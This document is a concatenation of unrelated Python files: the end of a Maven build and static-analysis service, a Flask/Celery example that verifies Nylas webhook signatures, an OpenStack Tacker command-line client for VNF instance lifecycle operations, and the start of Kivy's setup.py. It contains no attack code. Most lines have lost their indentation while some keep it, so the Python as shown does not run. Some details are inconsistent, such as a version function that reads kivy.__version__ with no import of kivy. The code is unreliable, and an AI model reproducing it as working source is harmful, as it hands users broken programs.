if ARTIFACT_ARCHIVER:
if ARTIFACT_ARCHIVER_PATH:
logger.info("%s: Running archiving on build artifacts as enabled" % commit_hash)
archiving_result = archive(repo_path, ARTIFACT_ARCHIVER_PATH, repo_id, commit_hash)
if archiving_result:
service_db.commit_log_tool(repo_id, commit_hash, 'artifacts_archived', artifact_archiver_version)
logger.info("%s: Finished archiving of build artifacts" % commit_hash)
else:
logger.warn("Build artifact archiving cannot be enabled if the archiving path is not specified")
# Get the commit parent history
logger.info("%s: Saving the commit parents" % commit_hash)
parent_commit_history = _get_commit_parents(repo_path, repo_id)
service_db.add_commit_history_graph(parent_commit_history)
# Getting the file history and adding it to the db
logger.info("%s: Obtaining file history" % commit_hash)
get_commit_file_history(service_db.db, repo_id, repo_path, commit_hash)
service_db.processed_commit(repo_id, commit_hash, commit_result, log=log)
def checkout_and_build_commit(self, commit_hash, repo_dir, author_date):
GIT().checkout(repo_dir, commit_hash)
# Check if it's a maven project
pom_file_path = os.path.join(repo_dir, "pom.xml")
pom_exists = os.path.exists(pom_file_path)
if not pom_exists:
logger.info("%s: Missing POM - Nothing to build" % commit_hash)
return "MISSING POM", ""
# Determine if we need to override the jdk
jdk_value = self.jdk_override.get_override(commit_hash, author_date)
mvn_value = self.mvn_override.get_override(commit_hash, author_date)
logger.info("%s: Building commit using MAVEN" % commit_hash)
# run the commit build
# "-Dmaven.test.skip.exec=true" disables testing on older version of Maven < surefire 2.3
mvn_command = "{jdk} MAVEN_OPTS=\"{maven_options}\" {mvn} clean package -DskipTests -Dmaven.test.skip.exec=true" \
.format(jdk=jdk_value, maven_options=MAVEN_OPTS, mvn=mvn_value)
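# With hypothetical override values such as
# jdk_value='JAVA_HOME=/usr/lib/jvm/java-8-openjdk' and mvn_value='mvn',
# this expands to a shell command of the form:
#   JAVA_HOME=... MAVEN_OPTS="..." mvn clean package -DskipTests -Dmaven.test.skip.exec=true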
logger.debug("%s: Maven command '%s'" % (commit_hash, mvn_command))
mvn_process = subprocess.Popen(mvn_command, shell=True, cwd=repo_dir, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
maven_logs = mvn_process.communicate()[0]
if mvn_process.returncode == 0:
logger.info("%s: Build Success" % commit_hash)
return BUILD_SUCCESS, maven_logs
else:
logger.warning("%s: Build Failed" % commit_hash)
return BUILD_FAILED, maven_logs
def _get_adaptor_output_dir_path(repo_dir):
return os.path.join(repo_dir, ADAPTOR_OUTPUT_DIR)
def _get_kdm_file_output_path(repo_dir):
# TODO make this configurable
return os.path.abspath(os.path.join(repo_dir, KDM_FILE))
def _run_static_analysis(repo_dir, commit):
adaptor_dir_path = _get_adaptor_output_dir_path(repo_dir)
# Create directory where to save toif adaptor files
if not os.path.exists(adaptor_dir_path):
os.makedirs(adaptor_dir_path)
return run(repo_dir, adaptor_dir_path, commit)
def _manage_assimilator_result(repo_id, commit_hash, repo_dir, service_db, class_file_mapping):
kdm_file = _get_kdm_file_output_path(repo_dir)
zip_kdm_file = kdm_file + ".zip"
# Determine if assimilator generated kdm file
if os.path.isfile(zip_kdm_file):
_extract_kdm_file(repo_dir)
if os.path.isfile(kdm_file):
# Process extracted kdm file
logger.info("%s: Extracting warnings" % commit_hash)
warnings = extract.etl_warnings(kdm_file, repo_dir, repo_id, commit_hash, class_file_mapping)
logger.info("%s: %s warnings identified" % (commit_hash, len(warnings)))
# Save warnings to db
service_db.add_commit_warning_lines(warnings)
# Get the line blames
logger.info("%s: Obtaining history of warnings", commit_hash)
line_blames = _get_line_blames(repo_dir, warnings)
for blame in line_blames:
blame["repo_id"] = repo_id
blame['commit_id'] = commit_hash
service_db.add_commit_warning_blames(line_blames)
else:
logger.error("%s: file %s does not exist. this is not normal as zip file existed" % (commit_hash, kdm_file))
else:
logger.info("%s: file %s does not exist. No file might have been analysed by static analysis tools" %
(commit_hash, zip_kdm_file))
def run_assimilator(repo_dir):
adaptor_output_path = os.path.abspath(_get_adaptor_output_dir_path(repo_dir))
assimilator_output_file_path = _get_kdm_file_output_path(repo_dir)
assimilator_process = subprocess.Popen("%s --merge --kdmfile=%s --inputfile=%s" %
(TOIF_EXECUTABLE, assimilator_output_file_path, adaptor_output_path),
shell=True, cwd=os.path.abspath(repo_dir), stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# return the assimilator log results
result = assimilator_process.communicate()[0]
return result
def _extract_kdm_file(repo_dir):
assimilator_output_file_path = _get_kdm_file_output_path(repo_dir)
# TODO remove when toif is fixed and does not create two copies of the file: {name} and {name}.zip. File {name} is empty
process = subprocess.Popen("rm %s; unzip %s" % (assimilator_output_file_path, assimilator_output_file_path + ".zip"),
shell=True, cwd=os.path.abspath(repo_dir), stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
process.communicate()[0]
def _get_commit_parents(repo_dir, repo_id, all_commits=False):
history = GIT().get_commit_parents(repo_dir, all_commits=all_commits)
commit_parents = []
for commit in history:
for parent in commit['parents']:
commit_parents.append({"repo_id": repo_id, "commit_id": commit["commit"], "parent_commit": parent})
return commit_parents
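# Example of the returned structure (hypothetical hashes): one row per
# (commit, parent) edge of the history graph, e.g.
#   [{'repo_id': repo_id, 'commit_id': 'abc123', 'parent_commit': 'def456'}, ...]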
def _get_line_blames(repo_dir, warnings):
files_with_warnings = {}
for warning in warnings:
file_path = warning['resource']
line_number = warning['line_number']
if file_path not in files_with_warnings:
files_with_warnings[file_path] = []
if line_number not in files_with_warnings[file_path]:
files_with_warnings[file_path].append(line_number)
warning_lines_blames = []
for file_path in files_with_warnings.keys():
blames = GIT().get_warning_blames(repo_dir, file_path, files_with_warnings[file_path])
warning_lines_blames.extend(blames)
return warning_lines_blames
WarningsGuruService()
|
|
#!/usr/bin/env python
# Imports from the Python standard library
from __future__ import print_function
import os
import sys
import datetime
import textwrap
import hmac
import hashlib
# Imports from third-party modules that this project depends on
try:
import requests
from flask import Flask, request, render_template
from werkzeug.middleware.proxy_fix import ProxyFix
from celery import Celery
except ImportError:
message = textwrap.dedent(
"""
You need to install the dependencies for this project.
To do so, run this command:
pip install -r requirements.txt
"""
)
print(message, file=sys.stderr)
sys.exit(1)
# This example uses Flask, a micro web framework written in Python.
# For more information, check out the documentation: http://flask.pocoo.org
# Create a Flask app, and load the configuration file.
app = Flask(__name__)
app.config.from_json("config.json")
# Check for dummy configuration values.
# If you are building your own application based on this example,
# you can remove this check from your code.
cfg_needs_replacing = [
key
for key, value in app.config.items()
if isinstance(value, str) and value.startswith("replace me")
]
if cfg_needs_replacing:
message = textwrap.dedent(
"""
This example will only work if you replace the fake configuration
values in `config.json` with real configuration values.
The following config values need to be replaced:
{keys}
Consult the README.md file in this directory for more information.
"""
).format(keys=", ".join(cfg_needs_replacing))
print(message, file=sys.stderr)
sys.exit(1)
# Teach Flask how to find out that it's behind an ngrok proxy
app.wsgi_app = ProxyFix(app.wsgi_app)
# This example also uses Celery, a task queue framework written in Python.
# For more information, check out the documentation: http://docs.celeryproject.org
# Create a Celery instance, and load its configuration from Flask.
celery = Celery(app.import_name)
celery.config_from_object(app.config, namespace="CELERY")
@app.route("/webhook", methods=["GET", "POST"])
def webhook():
"""
When the Flask server gets a request at the `/webhook` URL, it will run
this function. Most of the time, that request will be a genuine webhook
notification from Nylas. However, it's possible that the request could
be a fake notification from someone else, trying to fool our app. This
function needs to verify that the webhook is genuine!
"""
# When you first tell Nylas about your webhook, it will test that webhook
# URL with a GET request to make sure that it responds correctly.
# We just need to return the `challenge` parameter to indicate that this
# is a valid webhook URL.
if request.method == "GET" and "challenge" in request.args:
print(" * Nylas connected to the webhook!")
return request.args["challenge"]
# Alright, this is a POST request, which means it's a webhook notification.
# The question is, is it genuine or fake? Check the signature to find out.
is_genuine = verify_signature(
message=request.data,
key=app.config["NYLAS_OAUTH_CLIENT_SECRET"].encode("utf8"),
        signature=request.headers.get("X-Nylas-Signature", ""),
)
if not is_genuine:
return "Signature verification failed!", 401
# Alright, we have a genuine webhook notification from Nylas!
# Let's find out what it says...
data = request.get_json()
for delta in data["deltas"]:
        # Processing the data might take a while, or it might fail.
# As a result, instead of processing it right now, we'll push a task
# onto the Celery task queue, to handle it later. That way,
# we've got the data saved, and we can return a response to the
# Nylas webhook notification right now.
process_delta.delay(delta)
# Now that all the `process_delta` tasks have been queued, we can
# return an HTTP response to Nylas, to let them know that we processed
# the webhook notification successfully.
return "Deltas have been queued", 200
def verify_signature(message, key, signature):
"""
This function will verify the authenticity of a digital signature.
For security purposes, Nylas includes a digital signature in the headers
of every webhook notification, so that clients can verify that the
webhook request came from Nylas and no one else. The signing key
is your OAuth client secret, which only you and Nylas know.
"""
digest = hmac.new(key, msg=message, digestmod=hashlib.sha256).hexdigest()
return hmac.compare_digest(digest, signature)
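# A minimal sketch (not part of the original Nylas example) of the HMAC-SHA256
# scheme that verify_signature() implements. The function name, key, and body
# below are illustrative assumptions only; nothing here runs at import time.
def _signature_demo():
    demo_key = b"my-oauth-client-secret"  # hypothetical signing key
    demo_body = b'{"deltas": []}'         # hypothetical raw webhook body
    # The sender hashes the raw body with the shared secret...
    sent_signature = hmac.new(
        demo_key, msg=demo_body, digestmod=hashlib.sha256
    ).hexdigest()
    # ...and the receiver recomputes the digest and compares in constant time.
    return verify_signature(demo_body, demo_key, sent_signature)  # -> True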
@celery.task
def process_delta(delta):
"""
This is the part of the code where you would process the information
from the webhook notification. Each delta is one change that happened,
and might require fetching message IDs, updating your database,
and so on.
However, because this is just an example project, we'll just print
out information about the notification, so you can see what
information is being sent.
"""
kwargs = {
"type": delta["type"],
"date": datetime.datetime.utcfromtimestamp(delta["date"]),
"object_id": delta["object_data"]["id"],
}
print(" * {type} at {date} with ID {object_id}".format(**kwargs))
@app.route("/")
def index():
"""
This makes sure that when you visit the root of the website,
you get a webpage rather than a 404 error.
"""
return render_template("index.html", ngrok_url=ngrok_url())
def ngrok_url():
"""
If ngrok is running, it exposes an API on port 4040. We can use that
to figure out what URL it has assigned, and suggest that to the user.
https://ngrok.com/docs#list-tunnels
"""
try:
ngrok_resp = requests.get("http://localhost:4040/api/tunnels")
except requests.ConnectionError:
# I guess ngrok isn't running.
return None
ngrok_data = ngrok_resp.json()
secure_urls = [
tunnel["public_url"]
for tunnel in ngrok_data["tunnels"]
if tunnel["proto"] == "https"
]
return secure_urls[0]
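# Illustrative note (assumed shape, not taken from the original example): the
# ngrok local API at /api/tunnels returns JSON along the lines of
#   {"tunnels": [{"proto": "https", "public_url": "https://abc123.ngrok.io"},
#                {"proto": "http",  "public_url": "http://abc123.ngrok.io"}]}
# ngrok_url() above keeps only the https entries and returns the first one.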
# When this file is executed, this block of code will run.
if __name__ == "__main__":
if len(sys.argv) > 1 and sys.argv[1] == "--worker":
# Run the celery worker, *instead* of running the Flask web server.
celery.worker_main(sys.argv[1:])
sys.exit()
# If we get here, we're going to try to run the Flask web server.
url = ngrok_url()
if not url:
print(
"Looks like ngrok isn't running! Start it by running "
"`ngrok http 5000` in a different terminal window, "
"and then try running this example again.",
file=sys.stderr,
)
sys.exit(1)
print(" * Webhook URL: {url}/webhook".format(url=url))
if app.config.get("CELERY_TASK_ALWAYS_EAGER"):
print(" * Celery tasks will be run synchronously. No worker needed.")
    elif not celery.control.inspect().stats():
print(
" * You need to run at least one Celery worker, otherwise "
"the webhook notifications will never be processed.\n"
" To do so, run `{arg0} --worker` in a different "
"terminal window.".format(arg0=sys.argv[0])
)
app.run()
|
|
# Copyright (C) 2020 NTT DATA
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import logging
import os
import time
from osc_lib.command import command
from osc_lib import utils
from tackerclient.common import exceptions
from tackerclient.i18n import _
from tackerclient.osc import sdk_utils
from tackerclient.osc import utils as tacker_osc_utils
_attr_map = (
('id', 'ID', tacker_osc_utils.LIST_BOTH),
('vnfInstanceName', 'VNF Instance Name', tacker_osc_utils.LIST_BOTH),
('instantiationState', 'Instantiation State', tacker_osc_utils.LIST_BOTH),
('vnfProvider', 'VNF Provider', tacker_osc_utils.LIST_BOTH),
('vnfSoftwareVersion', 'VNF Software Version', tacker_osc_utils.LIST_BOTH),
('vnfProductName', 'VNF Product Name', tacker_osc_utils.LIST_BOTH),
('vnfdId', 'VNFD ID', tacker_osc_utils.LIST_BOTH)
)
LOG = logging.getLogger(__name__)
_mixed_case_fields = ('vnfInstanceName', 'vnfInstanceDescription', 'vnfdId',
'vnfProvider', 'vnfProductName', 'vnfSoftwareVersion',
'vnfdVersion', 'instantiationState',
'vimConnectionInfo', 'instantiatedVnfInfo')
_VNF_INSTANCE = 'vnf_instance'
VNF_INSTANCE_TERMINATION_TIMEOUT = 300
EXTRA_WAITING_TIME = 10
SLEEP_TIME = 1
formatters = {'vimConnectionInfo': tacker_osc_utils.FormatComplexDataColumn,
'instantiatedVnfInfo': tacker_osc_utils.FormatComplexDataColumn,
'_links': tacker_osc_utils.FormatComplexDataColumn}
def _get_columns(vnflcm_obj, action=None):
column_map = {
'id': 'ID',
'vnfInstanceName': 'VNF Instance Name',
'vnfInstanceDescription': 'VNF Instance Description',
'vnfdId': 'VNFD ID',
'vnfProvider': 'VNF Provider',
'vnfProductName': 'VNF Product Name',
'vnfSoftwareVersion': 'VNF Software Version',
'vnfdVersion': 'VNFD Version',
'instantiationState': 'Instantiation State',
'_links': 'Links',
}
if action == 'show':
if vnflcm_obj['instantiationState'] == 'INSTANTIATED':
column_map.update(
{'instantiatedVnfInfo': 'Instantiated Vnf Info'}
)
column_map.update(
{'vimConnectionInfo': 'VIM Connection Info',
'_links': 'Links'}
)
return sdk_utils.get_osc_show_columns_for_sdk_resource(vnflcm_obj,
column_map)
class CreateVnfLcm(command.ShowOne):
_description = _("Create a new VNF Instance")
def get_parser(self, prog_name):
parser = super(CreateVnfLcm, self).get_parser(prog_name)
parser.add_argument(
'vnfd_id',
metavar="<vnfd-id>",
help=_('Identifier that identifies the VNFD which defines the '
'VNF instance to be created.'))
parser.add_argument(
'--name',
metavar="<vnf-instance-name>",
help=_('Name of the VNF instance to be created.'))
parser.add_argument(
'--description',
metavar="<vnf-instance-description>",
help=_('Description of the VNF instance to be created.'))
parser.add_argument(
'--I',
metavar="<param-file>",
            help=_("Instantiate VNF subsequently after its creation. "
"Specify instantiate request parameters in a json file."))
return parser
def args2body(self, parsed_args, file_path=None):
body = {}
if file_path:
return jsonfile2body(file_path)
body['vnfdId'] = parsed_args.vnfd_id
if parsed_args.description:
body['vnfInstanceDescription'] = parsed_args.description
if parsed_args.name:
body['vnfInstanceName'] = parsed_args.name
return body
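    # Illustrative note (not part of the original client): given a vnfd id of
    # 'abc' plus --name demo and --description test, args2body() above returns
    #   {'vnfdId': 'abc', 'vnfInstanceName': 'demo',
    #    'vnfInstanceDescription': 'test'}
    # whereas passing file_path (from --I <param-file>) makes it return the
    # JSON file contents instead.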
def take_action(self, parsed_args):
client = self.app.client_manager.tackerclient
vnf = client.create_vnf_instance(self.args2body(parsed_args))
if parsed_args.I:
# Instantiate VNF instance.
result = client.instantiate_vnf_instance(
vnf['id'],
self.args2body(parsed_args, file_path=parsed_args.I))
if not result:
print((_('VNF Instance %(id)s is created and instantiation'
' request has been accepted.') % {'id': vnf['id']}))
display_columns, columns = _get_columns(vnf)
data = utils.get_item_properties(sdk_utils.DictModel(vnf),
columns, formatters=formatters,
mixed_case_fields=_mixed_case_fields)
return (display_columns, data)
class ShowVnfLcm(command.ShowOne):
_description = _("Display VNF instance details")
def get_parser(self, prog_name):
parser = super(ShowVnfLcm, self).get_parser(prog_name)
parser.add_argument(
_VNF_INSTANCE,
metavar="<vnf-instance>",
help=_("VNF instance ID to display"))
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.tackerclient
obj = client.show_vnf_instance(parsed_args.vnf_instance)
display_columns, columns = _get_columns(obj, action='show')
data = utils.get_item_properties(
sdk_utils.DictModel(obj),
columns, mixed_case_fields=_mixed_case_fields,
formatters=formatters)
return (display_columns, data)
class ListVnfLcm(command.Lister):
_description = _("List VNF Instance")
def get_parser(self, prog_name):
parser = super(ListVnfLcm, self).get_parser(prog_name)
return parser
def take_action(self, parsed_args):
_params = {}
client = self.app.client_manager.tackerclient
vnf_instances = client.list_vnf_instances(**_params)
headers, columns = tacker_osc_utils.get_column_definitions(
_attr_map, long_listing=True)
return (headers,
(utils.get_dict_properties(
s, columns, mixed_case_fields=_mixed_case_fields,
) for s in vnf_instances))
def jsonfile2body(file_path):
if file_path is not None and os.access(file_path, os.R_OK) is False:
msg = _("File %s does not exist or user does not have read "
"privileges to it")
reason = msg % file_path
raise exceptions.InvalidInput(reason=reason)
try:
with open(file_path) as f:
body = json.load(f)
except (IOError, ValueError) as ex:
msg = _("Failed to load parameter file. Error: %s")
reason = msg % ex
raise exceptions.InvalidInput(reason=reason)
if not body:
reason = _('The parameter file is empty')
raise exceptions.InvalidInput(reason=reason)
return body
class InstantiateVnfLcm(command.Command):
_description = _("Instantiate a VNF Instance")
def get_parser(self, prog_name):
parser = super(InstantiateVnfLcm, self).get_parser(prog_name)
parser.add_argument(
_VNF_INSTANCE,
metavar="<vnf-instance>",
help=_("VNF instance ID to instantiate"))
parser.add_argument(
'instantiation_request_file',
metavar="<param-file>",
help=_('Specify instantiate request parameters in a json file.'))
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.tackerclient
result = client.instantiate_vnf_instance(
parsed_args.vnf_instance, jsonfile2body(
parsed_args.instantiation_request_file))
if not result:
print((_('Instantiate request for VNF Instance %(id)s has been'
' accepted.') % {'id': parsed_args.vnf_instance}))
class HealVnfLcm(command.Command):
_description = _("Heal VNF Instance")
def get_parser(self, prog_name):
parser = super(HealVnfLcm, self).get_parser(prog_name)
parser.add_argument(
_VNF_INSTANCE,
metavar="<vnf-instance>",
help=_("VNF instance ID to heal"))
parser.add_argument(
'--cause',
help=_('Specify the reason why a healing procedure is required.'))
parser.add_argument(
'--vnfc-instance',
metavar="<vnfc-instance-id>",
nargs="+",
help=_("List of VNFC instances requiring a healing action.")
)
return parser
def args2body(self, parsed_args):
body = {}
if parsed_args.cause:
body['cause'] = parsed_args.cause
if parsed_args.vnfc_instance:
body['vnfcInstanceId'] = parsed_args.vnfc_instance
return body
def take_action(self, parsed_args):
client = self.app.client_manager.tackerclient
result = client.heal_vnf_instance(
parsed_args.vnf_instance, self.args2body(parsed_args))
if not result:
print((_('Heal request for VNF Instance %(id)s has been'
' accepted.') % {'id': parsed_args.vnf_instance}))
class TerminateVnfLcm(command.Command):
_description = _("Terminate a VNF instance")
def get_parser(self, prog_name):
parser = super(TerminateVnfLcm, self).get_parser(prog_name)
parser.add_argument(
_VNF_INSTANCE,
metavar="<vnf-instance>",
help=_("VNF instance ID to terminate"))
parser.add_argument(
"--termination-type",
default='GRACEFUL',
metavar="<termination-type>",
choices=['GRACEFUL', 'FORCEFUL'],
help=_("Termination type can be 'GRACEFUL' or 'FORCEFUL'. "
"Default is 'GRACEFUL'"))
parser.add_argument(
'--graceful-termination-timeout',
metavar="<graceful-termination-timeout>",
type=int,
help=_('This attribute is only applicable in case of graceful '
'termination. It defines the time to wait for the VNF to be'
' taken out of service before shutting down the VNF and '
'releasing the resources. The unit is seconds.'))
parser.add_argument(
'--D',
action='store_true',
default=False,
            help=_("Delete VNF Instance subsequently after its termination"),
)
return parser
def args2body(self, parsed_args):
body = {}
body['terminationType'] = parsed_args.termination_type
if parsed_args.graceful_termination_timeout:
if parsed_args.termination_type == 'FORCEFUL':
                raise exceptions.InvalidInput(
                    reason='--graceful-termination-timeout argument is '
                           'invalid for "FORCEFUL" termination')
body['gracefulTerminationTimeout'] = parsed_args.\
graceful_termination_timeout
return body
def take_action(self, parsed_args):
client = self.app.client_manager.tackerclient
result = client.terminate_vnf_instance(parsed_args.vnf_instance,
self.args2body(parsed_args))
if not result:
print(_("Terminate request for VNF Instance '%(id)s' has been"
" accepted.") % {'id': parsed_args.vnf_instance})
if parsed_args.D:
print(_("Waiting for vnf instance to be terminated before "
"deleting"))
self._wait_until_vnf_is_terminated(
client, parsed_args.vnf_instance,
graceful_timeout=parsed_args.graceful_termination_timeout)
result = client.delete_vnf_instance(parsed_args.vnf_instance)
if not result:
print(_("VNF Instance '%(id)s' deleted successfully") %
{'id': parsed_args.vnf_instance})
def _wait_until_vnf_is_terminated(self, client, vnf_instance_id,
graceful_timeout=None):
# wait until vnf instance 'instantiationState' is set to
# 'NOT_INSTANTIATED'
if graceful_timeout:
# If graceful_termination_timeout is provided,
# terminate vnf will start after this timeout period.
# Hence, it should wait for extra time of 10 seconds
# after this graceful_termination_timeout period.
timeout = graceful_timeout + EXTRA_WAITING_TIME
else:
timeout = VNF_INSTANCE_TERMINATION_TIMEOUT
start_time = int(time.time())
while True:
vnf_instance = client.show_vnf_instance(vnf_instance_id)
if vnf_instance['instantiationState'] == 'NOT_INSTANTIATED':
break
if ((int(time.time()) - start_time) > timeout):
msg = _("Couldn't verify vnf instance is terminated within "
"'%(timeout)s' seconds. Unable to delete vnf instance "
"%(id)s")
raise exceptions.CommandError(
message=msg % {'timeout': timeout, 'id': vnf_instance_id})
time.sleep(SLEEP_TIME)
class DeleteVnfLcm(command.Command):
"""Vnf lcm delete
    DeleteVnfLcm supports bulk deletion of vnf instances and per-instance
    error handling.
"""
_description = _("Delete VNF Instance(s)")
def get_parser(self, prog_name):
parser = super(DeleteVnfLcm, self).get_parser(prog_name)
parser.add_argument(
'vnf_instances',
metavar="<vnf-instance>",
nargs="+",
help=_("VNF instance ID(s) to delete"))
return parser
def take_action(self, parsed_args):
error_count = 0
client = self.app.client_manager.tackerclient
vnf_instances = parsed_args.vnf_instances
for vnf_instance in vnf_instances:
try:
client.delete_vnf_instance(vnf_instance)
except Exception as e:
error_count += 1
LOG.error(_("Failed to delete vnf instance with "
"ID '%(vnf)s': %(e)s"),
{'vnf': vnf_instance, 'e': e})
total = len(vnf_instances)
if (error_count > 0):
msg = (_("Failed to delete %(error_count)s of %(total)s "
"vnf instances.") % {'error_count': error_count,
'total': total})
raise exceptions.CommandError(message=msg)
else:
if total > 1:
print(_('All specified vnf instances are deleted '
'successfully'))
else:
print(_("Vnf instance '%s' deleted "
"successfully") % vnf_instances[0])
class UpdateVnfLcm(command.Command):
_description = _("Update VNF Instance")
def get_parser(self, prog_name):
"""Add arguments to parser.
Args:
prog_name ([string]): program name
Returns:
            parser ([ArgumentParser]): parser with the added arguments
"""
parser = super(UpdateVnfLcm, self).get_parser(prog_name)
parser.add_argument(
_VNF_INSTANCE,
metavar="<vnf-instance>",
help=_('VNF instance ID to update.'))
parser.add_argument(
'--I',
metavar="<param-file>",
help=_("Specify update request parameters in a json file."))
return parser
def args2body(self, file_path=None):
"""Call jsonfile2body to store request body to body(dict)
Args:
file_path ([string], optional): file path of param file(json).
Defaults to None.
Returns:
            body ([dict]): the request body
"""
body = {}
if file_path:
return jsonfile2body(file_path)
return body
def take_action(self, parsed_args):
"""Execute update_vnf_instance and output result comment
Args:
            parsed_args ([Namespace]): arguments parsed from the command line
"""
client = self.app.client_manager.tackerclient
if parsed_args.I:
# Update VNF instance.
result = client.update_vnf_instance(
parsed_args.vnf_instance,
self.args2body(file_path=parsed_args.I))
if not result:
                print((_('Update request for VNF Instance %(id)s has been'
                         ' accepted.') % {'id': parsed_args.vnf_instance}))
class ScaleVnfLcm(command.Command):
_description = _("Scale a VNF Instance")
def get_parser(self, prog_name):
parser = super(ScaleVnfLcm, self).get_parser(prog_name)
parser.add_argument(
_VNF_INSTANCE,
metavar="<vnf-instance>",
help=_('VNF instance ID to scale'))
parser.add_argument(
'--number-of-steps',
metavar="<number-of-steps>",
type=int,
help=_("Number of scaling steps to be executed as part of "
"this Scale VNF operation."))
parser.add_argument(
'--additional-param-file',
metavar="<additional-param-file>",
help=_("Additional parameters passed by the NFVO as input "
"to the scaling process."))
scale_require_parameters = parser.add_argument_group(
"require arguments"
)
scale_require_parameters.add_argument(
'--type',
metavar="<type>",
required=True,
choices=['SCALE_OUT', 'SCALE_IN'],
help=_("SCALE_OUT or SCALE_IN for type of scale operation."))
scale_require_parameters.add_argument(
'--aspect-id',
required=True,
metavar="<aspect-id>",
help=_("Identifier of the scaling aspect."))
return parser
def args2body(self, parsed_args):
"""To store request body, call jsonfile2body.
Args:
parsed_args ([Namespace]): arguments of CLI.
Returns:
            body ([dict]): the request body
"""
body = {'type': parsed_args.type, 'aspectId': parsed_args.aspect_id}
if parsed_args.number_of_steps:
body['numberOfSteps'] = parsed_args.number_of_steps
if parsed_args.additional_param_file:
body.update(jsonfile2body(parsed_args.additional_param_file))
return body
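    # Illustrative note (not part of the original client): with
    # --type SCALE_OUT --aspect-id worker --number-of-steps 2, args2body()
    # above yields {'type': 'SCALE_OUT', 'aspectId': 'worker',
    # 'numberOfSteps': 2}; any JSON supplied via --additional-param-file is
    # merged into that same dict.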
def take_action(self, parsed_args):
"""Execute scale_vnf_instance and output result comment.
Args:
parsed_args ([Namespace]): arguments of CLI.
"""
client = self.app.client_manager.tackerclient
result = client.scale_vnf_instance(
parsed_args.vnf_instance,
self.args2body(parsed_args))
if not result:
print((_('Scale request for VNF Instance %s has been accepted.')
% parsed_args.vnf_instance))
|
|
#
# Kivy - Cross-platform UI framework
# https://kivy.org/
#
from __future__ import print_function
import sys
build_examples = False
if "--build_examples" in sys.argv:
build_examples = True
sys.argv.remove("--build_examples")
from copy import deepcopy
import os
from os.path import join, dirname, sep, exists, basename, isdir
from os import walk, environ
from distutils.version import LooseVersion
from distutils.sysconfig import get_python_inc
from collections import OrderedDict
from time import sleep
from subprocess import check_output, CalledProcessError
from datetime import datetime
if environ.get('KIVY_USE_SETUPTOOLS'):
from setuptools import setup, Extension
print('Using setuptools')
else:
from distutils.core import setup
from distutils.extension import Extension
print('Using distutils')
PY3 = sys.version > '3'
if PY3: # fix error with py3's LooseVersion comparisons
def ver_equal(self, other):
return self.version == other
LooseVersion.__eq__ = ver_equal
def get_version(filename='kivy/version.py'):
VERSION = kivy.__version__
DATE = datetime.utcnow().strftime('%Y%m%d')
try:
GIT_REVISION = check_output(
['git', 'rev-parse', 'HEAD']
).strip().decode('ascii')
except CalledProcessError:
GIT_REVISION = "Unknown"
cnt = (
"# THIS FILE IS GENERATED FROM KIVY SETUP.PY\n"
"__version__ = '%(version)s'\n"
"__hash__ = '%(hash)s'\n"
"__date__ = '%(date)s'\n"
)
with open(filename, 'w') as f:
f.write(cnt % {
'version': VERSION,
'hash': GIT_REVISION,
'date': DATE
})
return VERSION
MIN_CYTHON_STRING = '0.23'
MIN_CYTHON_VERSION = LooseVersion(MIN_CYTHON_STRING)
MAX_CYTHON_STRING = '0.23'
MAX_CYTHON_VERSION = LooseVersion(MAX_CYTHON_STRING)
CYTHON_UNSUPPORTED = ()
def getoutput(cmd, env=None):
import subprocess
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, env=env)
p.wait()
if p.returncode: # if not returncode == 0
print('WARNING: A problem occurred while running {0} (code {1})\n'
.format(cmd, p.returncode))
stderr_content = p.stderr.read()
if stderr_content:
print('{0}\n'.format(stderr_content))
return ""
return p.stdout.read()
def pkgconfig(*packages, **kw):
flag_map = {'-I': 'include_dirs', '-L': 'library_dirs', '-l': 'libraries'}
lenviron = None
pconfig = join(sys.prefix, 'libs', 'pkgconfig')
if isdir(pconfig):
lenviron = environ.copy()
lenviron['PKG_CONFIG_PATH'] = '{};{}'.format(
environ.get('PKG_CONFIG_PATH', ''), pconfig)
cmd = 'pkg-config --libs --cflags {}'.format(' '.join(packages))
results = getoutput(cmd, lenviron).split()
for token in results:
ext = token[:2].decode('utf-8')
flag = flag_map.get(ext)
if not flag:
continue
kw.setdefault(flag, []).append(token[2:].decode('utf-8'))
return kw
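# Illustrative note (assumed output, not part of the original setup script):
# given pkg-config output such as
#   -I/usr/include/SDL2 -D_REENTRANT -L/usr/lib -lSDL2
# pkgconfig() above maps the recognised prefixes through flag_map and returns
#   {'include_dirs': ['/usr/include/SDL2'],
#    'library_dirs': ['/usr/lib'],
#    'libraries': ['SDL2']}
# while tokens with unrecognised prefixes (like -D_REENTRANT) are dropped.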
# -----------------------------------------------------------------------------
# Determine on which platform we are
platform = sys.platform
# Detect 32/64bit for OSX (http://stackoverflow.com/a/1405971/798575)
if sys.platform == 'darwin':
if sys.maxsize > 2 ** 32:
osx_arch = 'x86_64'
else:
osx_arch = 'i386'
# Detect Python for android project (http://github.com/kivy/python-for-android)
ndkplatform = environ.get('NDKPLATFORM')
if ndkplatform is not None and environ.get('LIBLINK'):
platform = 'android'
kivy_ios_root = environ.get('KIVYIOSROOT', None)
if kivy_ios_root is not None:
platform = 'ios'
if exists('/opt/vc/include/bcm_host.h'):
platform = 'rpi'
if exists('/usr/lib/arm-linux-gnueabihf/libMali.so'):
platform = 'mali'
# -----------------------------------------------------------------------------
# Detect options
#
c_options = OrderedDict()
c_options['use_rpi'] = platform == 'rpi'
c_options['use_mali'] = platform == 'mali'
c_options['use_egl'] = False
c_options['use_opengl_es2'] = None
c_options['use_opengl_mock'] = environ.get('READTHEDOCS', None) == 'True'
c_options['use_sdl2'] = None
c_options['use_ios'] = False
c_options['use_mesagl'] = False
c_options['use_x11'] = False
c_options['use_gstreamer'] = None
c_options['use_avfoundation'] = platform == 'darwin'
c_options['use_osx_frameworks'] = platform == 'darwin'
c_options['debug_gl'] = False
# now check if environ is changing the default values
for key in list(c_options.keys()):
ukey = key.upper()
if ukey in environ:
